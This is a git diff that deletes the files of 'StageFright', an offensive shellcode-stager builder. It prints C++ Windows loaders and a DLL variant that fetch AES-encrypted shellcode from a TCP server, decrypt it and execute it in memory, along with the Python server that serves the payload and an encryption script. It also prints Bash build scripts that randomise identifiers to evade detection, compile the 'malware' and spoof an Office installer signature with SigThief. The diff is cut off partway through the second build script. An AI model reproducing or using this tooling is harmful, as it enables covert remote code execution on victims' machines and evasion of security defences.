-bool kGOSfrjfhwzM(const char* TEInSsEqj, int yzdLOvSDmh, const char* Random4, char*& lfgRp, size_t& kIVqYdu) {
-    WSADATA wsaData;
-    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
-        printf("Failed to initialize Winsock.\n");
-        return false;
-    }
-
-    SOCKET clientSocket = socket(AF_INET, SOCK_STREAM, 0);
-    if (clientSocket == INVALID_SOCKET) {
-        perror("Error creating socket");
-        WSACleanup();
-        return false;
-    }
-
-    sockaddr_in serverAddress{};
-    serverAddress.sin_family = AF_INET;
-    serverAddress.sin_port = htons(yzdLOvSDmh);
-    serverAddress.sin_addr.s_addr = inet_addr(TEInSsEqj);
-
-    if (serverAddress.sin_addr.s_addr == INADDR_NONE) {
-        perror("Invalid address/Address not supported");
-        closesocket(clientSocket);
-        WSACleanup();
-        return false;
-    }
-
-    if (connect(clientSocket, (struct sockaddr*)&serverAddress, sizeof(serverAddress)) < 0) {
-        perror("Connection failed");
-        closesocket(clientSocket);
-        WSACleanup();
-        return false;
-    }
-
-    // Send the length of the file path first
-    size_t Random4Len = strlen(Random4);
-    printf("Sending file path length: %zu\n", Random4Len);
-    send(clientSocket, reinterpret_cast<char*>(&Random4Len), sizeof(Random4Len), 0);
-
-    // Send the file path to the server
-    printf("Sending file path: %s\n", Random4);
-    send(clientSocket, Random4, Random4Len, 0);
-
-    int fileSize;
-int bytesRead = recv(clientSocket, reinterpret_cast<char*>(&fileSize), sizeof(fileSize), 0);
-if (bytesRead != sizeof(fileSize)) {
-    printf("Error receiving file size: %d\n", WSAGetLastError());
-    closesocket(clientSocket);
-    WSACleanup();
-    return false;
-}
-
-fileSize = ntohl(fileSize); // Convert from network byte order to host byte order
-
-printf("Received file size: %d\n", fileSize);
-    // Receive and save the binary data in a dynamically allocated buffer
-    lfgRp = new char[fileSize];
-    if (lfgRp == nullptr) {
-        printf("Error allocating memory for binary data.\n");
-        closesocket(clientSocket);
-        WSACleanup();
-        return false;
-    }
-
-    size_t totalSize = 0;
-    while (totalSize < fileSize) {
-        bytesRead = recv(clientSocket, lfgRp + totalSize, fileSize - totalSize, 0);
-        if (bytesRead <= 0) {
-            printf("Error receiving binary data: %d\n", WSAGetLastError());
-            delete[] lfgRp;
-            closesocket(clientSocket);
-            WSACleanup();
-            return false;
-        }
-        totalSize += bytesRead;
-    }
-
-    // Close the socket
-    closesocket(clientSocket);
-
-    kIVqYdu = totalSize;
-    printf("Received data size: %zu\n", kIVqYdu);
-
-    return true;
-}
-
-int bVfdOlkjkxVS(char * DrKmsFdBXfMxR, unsigned int DrKmsFdBXfMxR_len, char * DLhQUbzLsS, size_t DLhQUbzLsSlen) {
-        HCRYPTPROV hProv;
-        HCRYPTHASH hHash;
-        HCRYPTKEY hKey;
-
-        if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){
-                return -1;
-        }
-        if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)){
-                return -1;
-        }
-        if (!CryptHashData(hHash, (BYTE*)DLhQUbzLsS, (DWORD)DLhQUbzLsSlen, 0)){
-                return -1;              
-        }
-        if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0,&hKey)){
-                return -1;
-        }
-        
-        if (!CryptDecrypt(hKey, (HCRYPTHASH) NULL, 0, 0, DrKmsFdBXfMxR, &DrKmsFdBXfMxR_len)){
-                return -1;
-        }
-        
-        CryptReleaseContext(hProv, 0);
-        CryptDestroyHash(hHash);
-        CryptDestroyKey(hKey);
-        
-        return 0;
-}
-
-
-
-char DLhQUbzLsS []=  { 0xf1, 0x9c, 0xad, 0x3a, 0x41, 0x79, 0xfb, 0x9f, 0xb, 0xb5, 0x3, 0xd7, 0x18, 0x82, 0xdd, 0x64 };
-
-int main() {
-    const char* TEInSsEqj = "192.168.1.12";  // Replace with the actual server IP
-    int yzdLOvSDmh = 8080;               // Replace with the actual server port
-    const char* Random4 = "invoice.txt";  // Replace with the actual file path on the server
-
-    char* lfgRp;
-    size_t kIVqYdu;
-
-    if (kGOSfrjfhwzM(TEInSsEqj, yzdLOvSDmh, Random4, lfgRp, kIVqYdu)) {
-        printf("Binary data received successfully.\n");
-
-        // Print received data size for debugging
-        printf("Received data size: %zu\n", kIVqYdu);
-        
-        bVfdOlkjkxVS((char *) lfgRp, kIVqYdu, DLhQUbzLsS, sizeof(DLhQUbzLsS));
-
-        // Allocate executable memory with READ, WRITE permissions
-        LPVOID executableMemory = VirtualAlloc(NULL, kIVqYdu, MEM_COMMIT, PAGE_READWRITE);
-        if (executableMemory == NULL) {
-            DWORD error = GetLastError();
-            printf("Error allocating executable memory: %d\n", error);
-            delete[] lfgRp;
-            return 1;
-        }
-
-        // Copy binary data to the executable memory
-        memcpy(executableMemory, lfgRp, kIVqYdu);
-        
-        // Change the protection to PAGE_EXECUTE_READ
-        DWORD oldProtect;
-        if (!VirtualProtect(executableMemory, kIVqYdu, PAGE_EXECUTE_READ, &oldProtect)) {
-            DWORD error = GetLastError();
-            printf("Error changing memory protection: %d\n", error);
-            VirtualFree(executableMemory, 0, MEM_RELEASE);
-            delete[] lfgRp;
-            return 1;
-        }
-
-        // Create a function pointer to the shellcode
-        zhCAcpCedgP lbagLzOZD = reinterpret_cast<zhCAcpCedgP>(executableMemory);
-
-        // Call the shellcode function
-        printf("Executing shellcode...\n");
-        lbagLzOZD();
-
-        // No freeing of allocated memory in this POC
-
-        printf("Shellcode executed successfully.\n");
-    } else {
-        printf("Failed to receive binary data.\n");
-        return 1;
-    }
-
-    return 0;
-}
-

StageFright/StageFright/StageFright/TCP/TCP.sh

@@ -1,189 +0,0 @@
-#!/bin/bash
-
-# Color variables
-red='\033[0;31m'
-green='\033[0;32m'
-yellow='\033[0;33m'
-blue='\033[0;34m'
-magenta='\033[0;35m'
-cyan='\033[0;36m'
-# Clear the color after that
-clear='\033[0m'
-cat << "EOF"
-  ___   _____ _____   _____                            _           _ 
- / _ \ |  ___/  ___| |  ___|                          | |         | |
-/ /_\ \| |__ \ `--.  | |__ _ __   ___ _ __ _   _ _ __ | |_ ___  __| |
-|  _  ||  __| `--. \ |  __| '_ \ / __| '__| | | | '_ \| __/ _ \/ _` |
-| | | || |___/\__/ / | |__| | | | (__| |  | |_| | |_) | ||  __/ (_| |
-\_| |_/\____/\____/  \____/_| |_|\___|_|   \__, | .__/ \__\___|\__,_|
-                                            __/ | |                  
-                                           |___/|_|                  
- _____ _                       _   _____ _____ ______                
-/  ___| |                     | | |_   _/  __ \| ___ \               
-\ `--.| |_ __ _  __ _  ___  __| |   | | | /  \/| |_/ /               
- `--. \ __/ _` |/ _` |/ _ \/ _` |   | | | |    |  __/                
-/\__/ / || (_| | (_| |  __/ (_| |   | | | \__/\| |                   
-\____/ \__\__,_|\__, |\___|\__,_|   \_/  \____/\_|                   
-                 __/ |                                               
-                |___/                                                
- _____                    _   _                                      
-|  ___|                  | | (_)                                     
-| |____  _____  ___ _   _| |_ _  ___  _ __                           
-|  __\ \/ / _ \/ __| | | | __| |/ _ \| '_ \                          
-| |___>  <  __/ (__| |_| | |_| | (_) | | | |                         
-\____/_/\_\___|\___|\__,_|\__|_|\___/|_| |_|                        
-
-EOF
-
-echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
-echo ""
-read Shellcode
-echo ""
-echo -e ${green}"What's Your Server IP?"${clear}
-echo ""
-read HOSTNAME
-echo ""
-echo -e ${green}"Enter Your Port"${clear}
-echo ""
-read PORTY
-echo ""
-echo -e ${green}"Name Your Shellcode File. ex: invoice.txt"${clear}
-echo ""
-read SHELLCODEFILE
-echo ""
-echo -e ${green}"Name Your Malware! ex: malware.exe"${clear}
-echo ""
-read MALWARE
-echo ""
-cp StageFright/TCP/template.cpp StageFright/TCP/Resources/template.cpp
-echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
-echo ""
-sleep 2
-python3 StageFright/TCP/Resources/aesencrypt.py $Shellcode > shell.txt
-echo -e ${yellow}"***Encryption Completed***"${clear}
-echo ""
-cp shell.txt shell2.txt
-
-#Generate AES Key
-keys=$(cat "shell2.txt")
-cut -d 'p' -f1 shell2.txt > shell3.txt
-keys=$(cat shell3.txt)
-keysnow=${keys#*=}
-sed -i "s/KEYVALUE/$keysnow/g" StageFright/TCP/Resources/template.cpp
-
-#Generate AES Payload
-payload=$(cat "shell.txt")
-payloadnow=${payload#*;}
-payloadtoday=${payloadnow#*=}
-echo $payloadtoday > shell5.txt
-cp StageFright/TCP/conv.py StageFright/TCP/Resources/con.py
-perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i StageFright/TCP/Resources/con.py
-sed -i "s/{/[/g" -i StageFright/TCP/Resources/con.py
-sed -i "s/}/]/g" -i StageFright/TCP/Resources/con.py
-sed -i "s/;//g" -i StageFright/TCP/Resources/con.py
-python3 StageFright/TCP/Resources/con.py
-#rm StageFright/TCP/Resources/con.py
-mv payload.bin $SHELLCODEFILE
-sleep 2
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
-RandomE=$(cat shell.txt)
-sed -i "s/RandomE/$RandomE/g" StageFright/TCP/Resources/template.cpp
-
-
-#Replace IP, PORT and SHELLCODEFILE
-sed -i "s/PORTY/$PORTY/g" StageFright/TCP/Resources/template.cpp
-sed -i "s/HOSTNAME/$HOSTNAME/g" StageFright/TCP/Resources/template.cpp
-sed -i "s/SHELLCODEFILE/$SHELLCODEFILE/g" StageFright/TCP/Resources/template.cpp
-#Replacing Values
-
-# Get Payload From URL Function
-
-#FindShare
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
-Random1=$(cat shell.txt)
-sed -i "s/Random1/$Random1/g" StageFright/TCP/Resources/template.cpp
-
-#pPayloadBytes
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
-Random2=$(cat shell.txt)
-sed -i "s/Random2/$Random2/g" StageFright/TCP/Resources/template.cpp
-
-#sPayloadSize
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
-Random3=$(cat shell.txt)
-sed -i "s/Random3/$Random3/g" StageFright/TCP/Resources/template.cpp
-
-#bSTATE
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
-Random5=$(cat shell.txt)
-sed -i "s/Random5/$Random5/g" StageFright/TCP/Resources/template.cpp
-
-#sSize
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-7} | head -n 1 > shell.txt
-Random6=$(cat shell.txt)
-sed -i "s/Random6/$Random6/g" StageFright/TCP/Resources/template.cpp
-
-#hInternet
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
-Random7=$(cat shell.txt)
-sed -i "s/Random7/$Random7/g" StageFright/TCP/Resources/template.cpp
-
-#dwBytesRead
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-13} | head -n 1 > shell.txt
-Random8=$(cat shell.txt)
-sed -i "s/Random8/$Random8/g" StageFright/TCP/Resources/template.cpp
-
-#pBytes
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
-Random9=$(cat shell.txt)
-sed -i "s/Random9/$Random9/g" StageFright/TCP/Resources/template.cpp
-
-#PAYLOAD
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
-RandomA=$(cat shell.txt)
-sed -i "s/RandomA/$RandomA/g" StageFright/TCP/Resources/template.cpp
-
-#Sleep Function
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
-RandomJ=$(cat shell.txt)
-sed -i "s/RandomJ/$RandomJ/g" StageFright/TCP/Resources/template.cpp
-
-#AES KEY NAME
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
-RandomK=$(cat shell.txt)
-sed -i "s/RandomK/$RandomK/g" StageFright/TCP/Resources/template.cpp
-
-# Main Function
-
-#Bytes
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
-RandomB=$(cat shell.txt)
-sed -i "s/RandomB/$RandomB/g" StageFright/TCP/Resources/template.cpp
-
-#Size
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
-RandomC=$(cat shell.txt)
-sed -i "s/RandomC/$RandomC/g" StageFright/TCP/Resources/template.cpp
-
-#Compile
-
-echo -e ${yellow}"+++Compiling Malware+++"${clear}
-x86_64-w64-mingw32-g++ -o $MALWARE StageFright/TCP/Resources/template.cpp -static-libgcc -static-libstdc++ -lws2_32 -lole32 -lwbemuuid -O2 -Wno-narrowing -fpermissive >/dev/null 2>&1
-echo ""
-sleep 2
-rm shell*
-echo -e ${yellow}"***Malware Compiled***"${clear}
-echo ""
-sleep 2
-echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
-echo ""
-sleep 2
-python3 StageFright/Resources/SigThief/sigthief.py -i StageFright/Resources/OfficeSetup.exe-t $MALWARE -o signed$MALWARE >/dev/null 2>&1
-mv signed$MALWARE $MALWARE
-echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
-echo ""
-echo -e ${yellow}"***Edit And Run The TCP Server***"${clear}
-
-

StageFright/StageFright/StageFright/TCP/conv.py

@@ -1,4 +0,0 @@
-buf=PAYVAL 
-payload = bytes(bytearray(buf))
-with open('payload.bin', 'wb') as f:
-    f.write(payload)

StageFright/StageFright/StageFright/TCP/tcp_server.py

@@ -1,69 +0,0 @@
-import socketserver
-import os
-
-class MyHandler(socketserver.BaseRequestHandler):
-    def handle(self):
-        print("Connection received from:", self.client_address)
-
-        try:
-            # Receive file path length
-            path_len_bytes = self.request.recv(8)
-            if not path_len_bytes:
-                print("Error receiving file path length.")
-                return
-
-            path_len = int.from_bytes(path_len_bytes, byteorder='little')  # Change byte order to 'little'
-            print(f"Received file path length: {path_len}")
-
-            # Receive file path
-            file_path_bytes = b""
-            while len(file_path_bytes) < path_len:
-                received_data = self.request.recv(path_len - len(file_path_bytes))
-                if not received_data:
-                    print("Error receiving file path.")
-                    return
-                file_path_bytes += received_data
-
-            file_name = file_path_bytes.decode('utf-8')
-            print("Received file name:", file_name)
-
-            # Check if the file exists
-            file_path = os.path.join(os.getcwd(), file_name)
-            print("Absolute file path:", file_path)
-            if os.path.exists(file_path):
-                print("File found:", file_path)
-
-                # Read file data
-                with open(file_path, 'rb') as file:
-                    file_data = file.read()
-
-                # Print the size before sending
-                file_size = len(file_data)
-                print("Size of file:", file_size)
-
-                # Send file size to the client
-                self.request.sendall(file_size.to_bytes(4, byteorder='big'))
-
-                # Send file data back to the client
-                self.request.sendall(file_data)
-                print("File data sent successfully.")
-
-            else:
-                print("File not found:", file_path)
-                self.request.sendall(b"FILE_NOT_FOUND")
-
-        except Exception as e:
-            print("Error:", str(e))
-            self.request.sendall(b"SERVER_ERROR")
-
-if __name__ == "__main__":
-    host, port = "192.168.1.12", 8080
-    server = socketserver.TCPServer((host, port), MyHandler)
-    print(f"Server listening on {host}:{port}")
-
-    try:
-        server.serve_forever()
-    except KeyboardInterrupt:
-        print("Server shutting down.")
-        server.shutdown()
-

StageFright/StageFright/StageFright/TCP/template.cpp

@@ -1,188 +0,0 @@
-#include <winsock2.h>
-#include <ws2tcpip.h>
-#include <windows.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <wincrypt.h>
-#pragma comment (lib, "crypt32.lib")
-#pragma comment (lib, "advapi32")
-#include <psapi.h>
-
-// Define the shellcode function signature
-typedef void (*RandomA)();
-
-bool Random1(const char* Random2, int Random3, const char* Random4, char*& Random5, size_t& Random6) {
-    WSADATA wsaData;
-    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
-        printf("Failed to initialize Winsock.\n");
-        return false;
-    }
-
-    SOCKET clientSocket = socket(AF_INET, SOCK_STREAM, 0);
-    if (clientSocket == INVALID_SOCKET) {
-        perror("Error creating socket");
-        WSACleanup();
-        return false;
-    }
-
-    sockaddr_in serverAddress{};
-    serverAddress.sin_family = AF_INET;
-    serverAddress.sin_port = htons(Random3);
-    serverAddress.sin_addr.s_addr = inet_addr(Random2);
-
-    if (serverAddress.sin_addr.s_addr == INADDR_NONE) {
-        perror("Invalid address/Address not supported");
-        closesocket(clientSocket);
-        WSACleanup();
-        return false;
-    }
-
-    if (connect(clientSocket, (struct sockaddr*)&serverAddress, sizeof(serverAddress)) < 0) {
-        perror("Connection failed");
-        closesocket(clientSocket);
-        WSACleanup();
-        return false;
-    }
-
-    // Send the length of the file path first
-    size_t Random4Len = strlen(Random4);
-    printf("Sending file path length: %zu\n", Random4Len);
-    send(clientSocket, reinterpret_cast<char*>(&Random4Len), sizeof(Random4Len), 0);
-
-    // Send the file path to the server
-    printf("Sending file path: %s\n", Random4);
-    send(clientSocket, Random4, Random4Len, 0);
-
-    int fileSize;
-int bytesRead = recv(clientSocket, reinterpret_cast<char*>(&fileSize), sizeof(fileSize), 0);
-if (bytesRead != sizeof(fileSize)) {
-    printf("Error receiving file size: %d\n", WSAGetLastError());
-    closesocket(clientSocket);
-    WSACleanup();
-    return false;
-}
-
-fileSize = ntohl(fileSize); // Convert from network byte order to host byte order
-
-printf("Received file size: %d\n", fileSize);
-    // Receive and save the binary data in a dynamically allocated buffer
-    Random5 = new char[fileSize];
-    if (Random5 == nullptr) {
-        printf("Error allocating memory for binary data.\n");
-        closesocket(clientSocket);
-        WSACleanup();
-        return false;
-    }
-
-    size_t totalSize = 0;
-    while (totalSize < fileSize) {
-        bytesRead = recv(clientSocket, Random5 + totalSize, fileSize - totalSize, 0);
-        if (bytesRead <= 0) {
-            printf("Error receiving binary data: %d\n", WSAGetLastError());
-            delete[] Random5;
-            closesocket(clientSocket);
-            WSACleanup();
-            return false;
-        }
-        totalSize += bytesRead;
-    }
-
-    // Close the socket
-    closesocket(clientSocket);
-
-    Random6 = totalSize;
-    printf("Received data size: %zu\n", Random6);
-
-    return true;
-}
-
-int Random7(char * Random8, unsigned int Random8_len, char * Random9, size_t Random9len) {
-        HCRYPTPROV hProv;
-        HCRYPTHASH hHash;
-        HCRYPTKEY hKey;
-
-        if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){
-                return -1;
-        }
-        if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)){
-                return -1;
-        }
-        if (!CryptHashData(hHash, (BYTE*)Random9, (DWORD)Random9len, 0)){
-                return -1;              
-        }
-        if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0,&hKey)){
-                return -1;
-        }
-        
-        if (!CryptDecrypt(hKey, (HCRYPTHASH) NULL, 0, 0, Random8, &Random8_len)){
-                return -1;
-        }
-        
-        CryptReleaseContext(hProv, 0);
-        CryptDestroyHash(hHash);
-        CryptDestroyKey(hKey);
-        
-        return 0;
-}
-
-
-
-char Random9 []= KEYVALUE
-
-int main() {
-    const char* Random2 = "HOSTNAME";  // Replace with the actual server IP
-    int Random3 = PORTY;               // Replace with the actual server port
-    const char* Random4 = "SHELLCODEFILE";  // Replace with the actual file path on the server
-
-    char* Random5;
-    size_t Random6;
-
-    if (Random1(Random2, Random3, Random4, Random5, Random6)) {
-        printf("Binary data received successfully.\n");
-
-        // Print received data size for debugging
-        printf("Received data size: %zu\n", Random6);
-        
-        Random7((char *) Random5, Random6, Random9, sizeof(Random9));
-
-        // Allocate executable memory with READ, WRITE permissions
-        LPVOID executableMemory = VirtualAlloc(NULL, Random6, MEM_COMMIT, PAGE_READWRITE);
-        if (executableMemory == NULL) {
-            DWORD error = GetLastError();
-            printf("Error allocating executable memory: %d\n", error);
-            delete[] Random5;
-            return 1;
-        }
-
-        // Copy binary data to the executable memory
-        memcpy(executableMemory, Random5, Random6);
-        
-        // Change the protection to PAGE_EXECUTE_READ
-        DWORD oldProtect;
-        if (!VirtualProtect(executableMemory, Random6, PAGE_EXECUTE_READ, &oldProtect)) {
-            DWORD error = GetLastError();
-            printf("Error changing memory protection: %d\n", error);
-            VirtualFree(executableMemory, 0, MEM_RELEASE);
-            delete[] Random5;
-            return 1;
-        }
-
-        // Create a function pointer to the shellcode
-        RandomA RandomB = reinterpret_cast<RandomA>(executableMemory);
-
-        // Call the shellcode function
-        printf("Executing shellcode...\n");
-        RandomB();
-
-        // No freeing of allocated memory in this POC
-
-        printf("Shellcode executed successfully.\n");
-    } else {
-        printf("Failed to receive binary data.\n");
-        return 1;
-    }
-
-    return 0;
-}
-

StageFright/StageFright/StageFright/TCPDLL/Resources/aesencrypt.py

@@ -1,26 +0,0 @@
-# Red Team Operator course code template
-# payload encryption with AES
-# 
-# author: reenz0h (twitter: @SEKTOR7net)
-
-import sys
-from base64 import b64encode
-from Crypto.Cipher import AES
-from Crypto.Util.Padding import pad
-from Crypto.Random import get_random_bytes
-import hashlib
-
-KEY = get_random_bytes(16)
-iv = 16 * b'\x00'
-cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
-
-try:
-    plaintext = open(sys.argv[1], "rb").read()
-except:
-    print("File argument needed! %s <raw payload file>" % sys.argv[0])
-    sys.exit()
-
-ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
-
-print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
-print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

StageFright/StageFright/StageFright/TCPDLL/Resources/template.cpp

@@ -1,188 +0,0 @@
-#include <winsock2.h>
-#include <ws2tcpip.h>
-#include <windows.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <wincrypt.h>
-#pragma comment(lib, "crypt32.lib")
-#pragma comment(lib, "advapi32")
-#include <psapi.h>
-
-// Define the shellcode function signature
-typedef void (*HUUTjodrPVG)();
-
-bool WXEjtHeXGRaH(const char* OQmbgsGuW, int yprPDCUUPq, const char* Random4, char*& GugJH, size_t& ENUQBQQ) {
-    WSADATA wsaData;
-    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
-        printf("Failed to initialize Winsock.\n");
-        return false;
-    }
-
-    SOCKET clientSocket = socket(AF_INET, SOCK_STREAM, 0);
-    if (clientSocket == INVALID_SOCKET) {
-        perror("Error creating socket");
-        WSACleanup();
-        return false;
-    }
-
-    sockaddr_in serverAddress{};
-    serverAddress.sin_family = AF_INET;
-    serverAddress.sin_port = htons(yprPDCUUPq);
-    serverAddress.sin_addr.s_addr = inet_addr(OQmbgsGuW);
-
-    if (serverAddress.sin_addr.s_addr == INADDR_NONE) {
-        perror("Invalid address/Address not supported");
-        closesocket(clientSocket);
-        WSACleanup();
-        return false;
-    }
-
-    if (connect(clientSocket, (struct sockaddr*)&serverAddress, sizeof(serverAddress)) < 0) {
-        perror("Connection failed");
-        closesocket(clientSocket);
-        WSACleanup();
-        return false;
-    }
-
-    // Send the length of the file path first
-    size_t Random4Len = strlen(Random4);
-    printf("Sending file path length: %zu\n", Random4Len);
-    send(clientSocket, reinterpret_cast<char*>(&Random4Len), sizeof(Random4Len), 0);
-
-    // Send the file path to the server
-    printf("Sending file path: %s\n", Random4);
-    send(clientSocket, Random4, Random4Len, 0);
-
-    int fileSize;
-    int bytesRead = recv(clientSocket, reinterpret_cast<char*>(&fileSize), sizeof(fileSize), 0);
-    if (bytesRead != sizeof(fileSize)) {
-        printf("Error receiving file size: %d\n", WSAGetLastError());
-        closesocket(clientSocket);
-        WSACleanup();
-        return false;
-    }
-
-    fileSize = ntohl(fileSize); // Convert from network byte order to host byte order
-
-    printf("Received file size: %d\n", fileSize);
-    // Receive and save the binary data in a dynamically allocated buffer
-    GugJH = new char[fileSize];
-    if (GugJH == nullptr) {
-        printf("Error allocating memory for binary data.\n");
-        closesocket(clientSocket);
-        WSACleanup();
-        return false;
-    }
-
-    size_t totalSize = 0;
-    while (totalSize < fileSize) {
-        bytesRead = recv(clientSocket, GugJH + totalSize, fileSize - totalSize, 0);
-        if (bytesRead <= 0) {
-            printf("Error receiving binary data: %d\n", WSAGetLastError());
-            delete[] GugJH;
-            closesocket(clientSocket);
-            WSACleanup();
-            return false;
-        }
-        totalSize += bytesRead;
-    }
-
-    // Close the socket
-    closesocket(clientSocket);
-
-    ENUQBQQ = totalSize;
-    printf("Received data size: %zu\n", ENUQBQQ);
-
-    return true;
-}
-
-int kaRyEcluPiEW(char* gwtamZsHddxtV, unsigned int gwtamZsHddxtV_len, char* iNjzxZyJyK, size_t iNjzxZyJyKlen) {
-    HCRYPTPROV hProv;
-    HCRYPTHASH hHash;
-    HCRYPTKEY hKey;
-
-    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
-        return -1;
-    }
-    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
-        return -1;
-    }
-    if (!CryptHashData(hHash, (BYTE*)iNjzxZyJyK, (DWORD)iNjzxZyJyKlen, 0)) {
-        return -1;
-    }
-    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
-        return -1;
-    }
-
-    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, gwtamZsHddxtV, &gwtamZsHddxtV_len)) {
-        return -1;
-    }
-
-    CryptReleaseContext(hProv, 0);
-    CryptDestroyHash(hHash);
-    CryptDestroyKey(hKey);
-
-    return 0;
-}
-
-char iNjzxZyJyK[] =  { 0x59, 0xfa, 0xe2, 0x44, 0x6c, 0xf1, 0x9e, 0xf6, 0xdf, 0xd8, 0x4e, 0x16, 0xcd, 0xf5, 0x8a, 0xf6 };;
-
-extern "C" void CALLBACK Go(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
-    const char* OQmbgsGuW = "192.168.1.12";        // Replace with the actual server IP
-    int yprPDCUUPq = 8080;                     // Replace with the actual server port
-    const char* Random4 = "invoice.txt";   // Replace with the actual file path on the server
-
-    char* GugJH;
-    size_t ENUQBQQ;
-
-    if (WXEjtHeXGRaH(OQmbgsGuW, yprPDCUUPq, Random4, GugJH, ENUQBQQ)) {
-        printf("Binary data received successfully.\n");
-
-        // Print received data size for debugging
-        printf("Received data size: %zu\n", ENUQBQQ);
-
-        kaRyEcluPiEW((char*)GugJH, ENUQBQQ, iNjzxZyJyK, sizeof(iNjzxZyJyK));
-
-        // Allocate executable memory with READ, WRITE permissions
-        LPVOID executableMemory = VirtualAlloc(NULL, ENUQBQQ, MEM_COMMIT, PAGE_READWRITE);
-        if (executableMemory == NULL) {
-            DWORD error = GetLastError();
-            printf("Error allocating executable memory: %d\n", error);
-            delete[] GugJH;
-            return;
-        }
-
-        // Copy binary data to the executable memory
-        memcpy(executableMemory, GugJH, ENUQBQQ);
-
-        // Change the protection to PAGE_EXECUTE_READ
-        DWORD oldProtect;
-        if (!VirtualProtect(executableMemory, ENUQBQQ, PAGE_EXECUTE_READ, &oldProtect)) {
-            DWORD error = GetLastError();
-            printf("Error changing memory protection: %d\n", error);
-            VirtualFree(executableMemory, 0, MEM_RELEASE);
-            delete[] GugJH;
-            return;
-        }
-
-        // Create a function pointer to the shellcode
-        HUUTjodrPVG pCyhiFoGQ = reinterpret_cast<HUUTjodrPVG>(executableMemory);
-
-        // Call the shellcode function
-        printf("Executing shellcode...\n");
-        pCyhiFoGQ();
-
-        // No freeing of allocated memory in this POC
-
-        printf("Shellcode executed successfully.\n");
-
-        // Free allocated memory
-        delete[] GugJH;
-    } else {
-        printf("Failed to receive binary data.\n");
-        return;
-    }
-}
-
-

StageFright/StageFright/StageFright/TCPDLL/TCPDLL.sh

@@ -1,175 +0,0 @@
-#!/bin/bash
-
-# Color variables
-red='\033[0;31m'
-green='\033[0;32m'
-yellow='\033[0;33m'
-blue='\033[0;34m'
-magenta='\033[0;35m'
-cyan='\033[0;36m'
-# Clear the color after that
-clear='\033[0m'
-cat << "EOF"
-TCP DLL STAGER                        
-
-EOF
-
-echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
-echo ""
-read Shellcode
-echo ""
-echo -e ${green}"What's The IP For Your TCP Server?"${clear}
-echo ""
-read HOSTIP
-echo ""
-echo -e ${green}"What Is The Port Your TCP Server Is Using?"${clear}
-echo ""
-read PORTY
-echo ""
-echo -e ${green}"Name Your Shellcode File. ex: invoice.txt"${clear}
-echo ""
-read SHELLCODEFILE
-echo ""
-echo -e ${green}"Name Your Entry Point Function"${clear}
-echo ""
-read ENTRYPOINT
-echo ""
-echo -e ${green}"Name Your Malware! ex: malware.dll"${clear}
-echo ""
-read MALWARE
-echo ""
-cp StageFright/TCPDLL/template.cpp StageFright/TCPDLL/Resources/template.cpp
-echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
-echo ""
-sleep 2
-python3 StageFright/TCPDLL/Resources/aesencrypt.py $Shellcode > shell.txt
-echo -e ${yellow}"***Encryption Completed***"${clear}
-echo ""
-cp shell.txt shell2.txt
-
-#Generate AES Key
-keys=$(cat "shell2.txt")
-cut -d 'p' -f1 shell2.txt > shell3.txt
-keys=$(cat shell3.txt)
-keysnow=${keys#*=}
-sed -i "s/KEYVALUE/$keysnow/g" StageFright/TCPDLL/Resources/template.cpp
-
-#Generate AES Payload
-payload=$(cat "shell.txt")
-payloadnow=${payload#*;}
-payloadtoday=${payloadnow#*=}
-echo $payloadtoday > shell5.txt
-cp StageFright/TCPDLL/conv.py StageFright/TCPDLL/Resources/con.py
